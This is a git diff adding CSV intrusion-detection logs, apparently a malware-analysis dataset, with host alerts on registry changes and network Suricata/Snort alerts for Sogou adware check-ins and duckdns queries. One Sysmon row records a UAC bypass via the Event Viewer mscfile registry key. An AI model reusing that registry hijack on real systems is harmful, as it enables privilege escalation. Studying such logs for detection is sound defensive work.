+"Apr 24, 2020 @ 12:30:24.846",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'bbd3c2d027909fd8ca60e5fb29be1c11' +New md5sum is : '1930b7b98646b0623c4d71c29ee5577a' +Old sha1sum was: '840961701b92e0a0bb75a3c992b2e764bb835d51' +New sha1sum is : '734e001445fab8494836c3ebbc7b6ed4be5733d7' +", +"Apr 24, 2020 @ 12:30:24.831",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '4256845286e0a414097e9c63c150cb5d' +New md5sum is : '08af0e89b70fc23b04544d71af2b61c5' +Old sha1sum was: '684a425e096a2850d4c8dc9679a024c65fd89a91' +New sha1sum is : 'cc74990798ae65506078b5b0d1f8cd9895cac982' +", +"Apr 24, 2020 @ 12:29:32.915",5,"Windows System error event",,"""The time service has detected that the system time needs to be changed by 1469566 seconds. The time service will not change the system time by more than 54000 seconds. Verify that your time and time zone are correct, and that the time source time.windows.com,0x9 (ntp.m|0x9|0.0.0.0:123->51.105.208.173:123) is working properly.""" +"Apr 24, 2020 @ 12:29:28.337",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +", +"Apr 24, 2020 @ 12:29:27.134",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '98a752dd618ea8df177c9595a9802822' +New md5sum is : '7b9a258df5c6f99956d6f9b3e3d7ae65' +Old sha1sum was: 'a29c098299c75cf2c48bab76549b29b6987fee6c' +New sha1sum is : 'f43e91a27dea3b358a46525fb4a5655eb79a3977' +", +"Apr 24, 2020 @ 12:29:27.117",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '8776cf6928f2de374d1a329d7b0948c3' +New md5sum is : 'f2d628e8126f35291c90bff7ffc31c08' +Old sha1sum was: '520ae6cd4e088c14c27c500ba09b18024715ec29' +New sha1sum is : '34b84884b9283368a58ac1de788d118fbab8ff2a' +", +"Apr 24, 2020 @ 12:28:10.045",3,"Service startup type was changed",,"""The start type of the Background Intelligent Transfer Service service was changed from auto start to demand start.""" diff --git a/data/MW_2_HIDS_3.csv b/data/MW_2_HIDS_3.csv new file mode 100644 index 0000000..0e4da1b --- /dev/null +++ b/data/MW_2_HIDS_3.csv @@ -0,0 +1,74 @@ +timestamp,"rule.level","rule.description","data.win.system.message","full_log","data.win.eventdata.commandLine" +"May 22, 2020 @ 16:11:50.652",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '496e80acc19637c8daf8c286b6ea10f0' +New md5sum is : '8bd1d574020364cb73c94def0fb5afce' +Old sha1sum was: '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +New sha1sum is : '1ae6bc9b8cc2b6e85d7130b80fbc843b783b1f11' +", +"May 22, 2020 @ 16:11:50.636",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '89598d32459256342f73e9b832b618dc' +New md5sum is : '92eeaba3a494969a7bbeaf8cd573d02f' +Old sha1sum was: '68aacf23a86d664018607a7fc5d1379269af8643' +New sha1sum is : 'd8d3ae51554b01731209ca4829f6aa7188d111a3' +", +"May 22, 2020 @ 16:10:23.610",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,, +"May 22, 2020 @ 16:10:15.446",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",, +"May 22, 2020 @ 16:06:11.420",7,"Integrity checksum changed.",,"File 'HKEY_LOCAL_MACHINE\Security\Policy\PolAdtEv' checksum changed. +Old md5sum was: '9d15aff4d26f802c3c4d3d74a00d8d4d' +New md5sum is : 'b40de87500ee3eed90c2ce3ce8c7946f' +Old sha1sum was: '11f3afa3902d0fadfcc52e4c051995f536c7d4e2' +New sha1sum is : '2f6e6dd0efd148b1c11d33c91e9cea4a97a84792' +", +"May 22, 2020 @ 16:04:54.485",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: Handle Manipulation + Subcategory GUID: {0cce9223-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 16:04:54.407",8,"Windows Audit Policy changed","""System audit policy was changed. + +Subject: + Security ID: S-1-5-18 + Account Name: DESKTOP-HUE026H$ + Account Domain: WORKGROUP + Logon ID: 0x3E7 + +Audit Policy Change: + Category: Object Access + Subcategory: File System + Subcategory GUID: {0cce921d-69ae-11d9-bed3-505054503030} + Changes: Success Added""",, +"May 22, 2020 @ 16:04:45.812",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '05688d3fb01c8753b031688cb1be8a9a' +New md5sum is : '496e80acc19637c8daf8c286b6ea10f0' +Old sha1sum was: '07d2e2efcc0eef4f0950f87eb46ce7cb7d621014' +New sha1sum is : '88ef9e17f6f18f6242bf8a46b383b017d42012b9' +", +"May 22, 2020 @ 16:04:45.797",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'b9b17232ab989d43145b713d83b31e56' +New md5sum is : '89598d32459256342f73e9b832b618dc' +Old sha1sum was: '59a9b4d3dd2bb5573d31e1aff08c6d38bf7d7d43' +New sha1sum is : '68aacf23a86d664018607a7fc5d1379269af8643' +", +"May 22, 2020 @ 16:04:41.048",7,"Integrity checksum changed.",,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '370914f65a755a1cbfcf0c873b11feaa' +New md5sum is : '1c729912f87f9abbd1574176fc5996f7' +Old sha1sum was: 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +New sha1sum is : '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +", +"May 22, 2020 @ 16:04:12.583",15,"ATT&CK T1088: UAC Bypass via Event Viewer","""Registry value set: +RuleName: T1042 +EventType: SetValue +UtcTime: 2020-05-22 13:18:16.616 +ProcessGuid: {df9fc3d3-d118-5ec7-0000-00109ec01100} +ProcessId: 6988 +Image: C:\Users\John Williams\Downloads\program2.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001_Classes\mscfile\shell\open\command\(Default) +Details: C:\Users\John Williams\Downloads\program2.exe""","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:18:16.631941300Z"",""eventRecordID"":""907"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1042\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:18:16.616\r\nProcessGuid: {df9fc3d3-d118-5ec7-0000-00109ec01100}\r\nProcessId: 6988\r\nImage: C:\\Users\\John Williams\\Downloads\\program2.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001_Classes\\mscfile\\shell\\open\\command\\(Default)\r\nDetails: C:\\Users\\John Williams\\Downloads\\program2.exe\""""},""eventdata"":{""ruleName"":""T1042"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:18:16.616"",""processGuid"":""{df9fc3d3-d118-5ec7-0000-00109ec01100}"",""processId"":""6988"",""image"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program2.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)"",""details"":""C:\\\\Users\\\\John Williams\\\\Downloads\\\\program2.exe""}}}", diff --git a/data/MW_2_NIDS.csv b/data/MW_2_NIDS.csv new file mode 100644 index 0000000..8b84331 --- /dev/null +++ b/data/MW_2_NIDS.csv @@ -0,0 +1,6 @@ +"@timestamp",message,"log.file.path" +"Apr 4, 2020 @ 14:49:15.594","04/04/2020-14:49:14.333152 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:55333 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:49:08.590","04/04/2020-14:48:59.973229 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:58191 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:48:03.584","04/04/2020-14:47:58.048129 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:63783 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:48:03.584","04/04/2020-14:47:59.050078 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:63783 -> 172.16.2.1:53","/var/log/suricata/fast.log" +"Apr 4, 2020 @ 14:48:03.583","04/04/2020-14:47:57.258514 [**] [1:2022918:2] ET INFO DYNAMIC_DNS Query to *.duckdns. Domain [**] [Classification: Misc activity] [Priority: 3] {UDP} 172.16.2.2:63783 -> 172.16.2.1:53","/var/log/suricata/fast.log" diff --git a/data/MW_30_HIDS_3.csv b/data/MW_30_HIDS_3.csv new file mode 100644 index 0000000..11bc2db --- /dev/null +++ b/data/MW_30_HIDS_3.csv @@ -0,0 +1,42 @@ +timestamp,"rule.level","rule.description","data.win.system.message","data.win.eventdata.commandLine","data.win.eventdata.targetObject","full_log","data.win.eventdata.details" +"May 31, 2020 @ 13:43:39.300",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_ENABLE_HTTP2' checksum changed. +Old md5sum was: '19a84742b6b5ff086df143d980ae4afe' +New md5sum is : '3d5dfdf70489c96988a67b733c998d33' +Old sha1sum was: '059238efcadea262aecd701312fba26b753c1423' +New sha1sum is : 'f73c7d8c6bd7817bd8c59b3473f67f03e39e5811' +", +"May 31, 2020 @ 13:43:38.165",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MAXCONNECTIONSPERSERVER' checksum changed. +Old md5sum was: 'd80d1f3cbf8f90f787a0b09282119947' +New md5sum is : '66f9de40f01f43922ce290fd529be6f6' +Old sha1sum was: '387915cc44190d01197354f7b600e1cd7ccffd55' +New sha1sum is : '79b04ee91b68c25665eef548034ab27c28a642da' +", +"May 31, 2020 @ 13:30:17.547",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_WINDOWEDSELECTCONTROL' checksum changed. +Old md5sum was: '1c729912f87f9abbd1574176fc5996f7' +New md5sum is : '370914f65a755a1cbfcf0c873b11feaa' +Old sha1sum was: '1d2094dc263dc3db258f4421536e179cfbd9cfb0' +New sha1sum is : 'ea4c2f8e1a1dc5de73a98dbadb5abff9297c9a4b' +", +"May 31, 2020 @ 13:27:54.122",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. +Old md5sum was: '4851a8fa9ed6c37f76f4ef6c0dd6d33e' +New md5sum is : 'c12e8a73095bad27b1cc02a25306e36f' +Old sha1sum was: '96ff488eeb3d9b9ede478b6e2d70a97d2cd5d937' +New sha1sum is : 'a0ff409933dc115dae27ec11fce7bac75925010f' +", +"May 31, 2020 @ 13:27:54.108",7,"Integrity checksum changed.",,,,"File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'd81f7e509f5c1a9330ce7886a815c11b' +New md5sum is : '29446b14184e8caf0aea576ee321f0f4' +Old sha1sum was: '032f00848ab7f2fe55a7b63edfa8c5598fbf5268' +New sha1sum is : 'bb6ecadefeba5206120a42a61651b3ea7d9a4bb2' +", +"May 31, 2020 @ 13:26:24.850",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",,,,, +"May 31, 2020 @ 13:26:15.517",7,"SessionEnv was unavailable to handle a critical notification event","""The winlogon notification subscriber was unavailable to handle a critical notification event.""",,,, +"May 31, 2020 @ 13:21:18.146",10,"ATT&CK T1060: Autorun Keys Modification","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-28 12:56:35.494 +ProcessGuid: {df9fc3d3-b4fa-5ecf-0000-0010a9aa2d00} +ProcessId: 2776 +Image: C:\Program Files (x86)\SogouSoftware\tmp\ExternalApp.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\SogouSoftwareAutoRun +Details: C:\Program Files (x86)\SogouSoftware\SogouSoftware.exe /AutoRun""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SogouSoftwareAutoRun","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:56:35.518723400Z"",""eventRecordID"":""2488"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-28 12:56:35.494\r\nProcessGuid: {df9fc3d3-b4fa-5ecf-0000-0010a9aa2d00}\r\nProcessId: 2776\r\nImage: C:\\Program Files (x86)\\SogouSoftware\\tmp\\ExternalApp.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SogouSoftwareAutoRun\r\nDetails: C:\\Program Files (x86)\\SogouSoftware\\SogouSoftware.exe /AutoRun\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-28 12:56:35.494"",""processGuid"":""{df9fc3d3-b4fa-5ecf-0000-0010a9aa2d00}"",""processId"":""2776"",""image"":""C:\\\\Program Files (x86)\\\\SogouSoftware\\\\tmp\\\\ExternalApp.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\SogouSoftwareAutoRun"",""details"":""C:\\\\Program Files (x86)\\\\SogouSoftware\\\\SogouSoftware.exe /AutoRun""}}}","C:\\Program Files (x86)\\SogouSoftware\\SogouSoftware.exe /AutoRun" diff --git a/data/MW_30_NIDS.csv b/data/MW_30_NIDS.csv new file mode 100644 index 0000000..730b7ba --- /dev/null +++ b/data/MW_30_NIDS.csv @@ -0,0 +1,73 @@ +"@timestamp",message,"log.file.path" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:42.179597 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:42.370565 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:42.973119 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:43.219921 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:43.485568 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.454","05/31/2020-13:26:43.649905 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:40.962535 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:42.227432 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:42.376140 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:42.973972 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:43.319729 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:26:49.407","05/31-13:26:43.486719 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:49694 -> 211.159.235.146:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:54.426","05/31/2020-13:24:53.856516 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:54.357","05/31-13:24:53.366641 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:53.424","05/31/2020-13:24:52.513446 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:53.424","05/31/2020-13:24:52.697039 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:53.424","05/31/2020-13:24:52.884089 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:53.424","05/31/2020-13:24:53.087993 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:53.355","05/31-13:24:52.514048 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:53.355","05/31-13:24:52.704253 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:53.355","05/31-13:24:52.905493 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:53.354","05/31-13:24:52.013683 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.423","05/31/2020-13:24:51.467147 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:52.423","05/31/2020-13:24:51.646792 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:52.423","05/31/2020-13:24:51.832259 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:52.423","05/31/2020-13:24:52.012868 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.101469 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.285466 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.468059 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.647978 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:52.353","05/31-13:24:51.833584 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:51.422","05/31/2020-13:24:50.916836 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:51.422","05/31/2020-13:24:51.100652 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:51.422","05/31/2020-13:24:51.282766 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:51.352","05/31-13:24:47.722449 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:51.352","05/31-13:24:50.917871 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50257 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:24:50.421","05/31/2020-13:24:44.385971 [**] [1:2014726:124] ET POLICY Outdated Flash Version M1 [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50254 -> 113.200.16.208:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:50.421","05/31/2020-13:24:44.390912 [**] [1:2015704:6] ET CURRENT_EVENTS DoSWF Flash Encryption Banner [**] [Classification: Attempted User Privilege Gain] [Priority: 1] {TCP} 113.200.16.208:80 -> 172.16.2.2:50254","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:24:48.350","05/31-13:24:44.062505 [**] [1:2014726:120] ET POLICY Outdated Flash Version M1 [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 172.16.2.2:50254 -> 113.200.16.208:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:23:35.410","05/31/2020-13:23:26.862679 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:23:35.410","05/31/2020-13:23:27.803291 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:23:35.410","05/31/2020-13:23:28.019515 [**] [1:2822075:3] ETPRO ADWARE_PUP PUA.Sogou Checkin [**] [Classification: Possibly Unwanted Program Detected] [Priority: 2] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/suricata/fast.log" +"May 31, 2020 @ 13:23:33.342","05/31-13:21:21.321392 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50114 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:23:33.342","05/31-13:23:26.681509 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 172.16.2.2:50189 -> 211.159.235.58:80","/var/log/snort/alert.fast" +"May 31, 2020 @ 13:23:33.342","05/31-13:23:27.623394 [**] [1:2822075:2] ETPRO MALWARE PUA.Sogou Checkin [**] 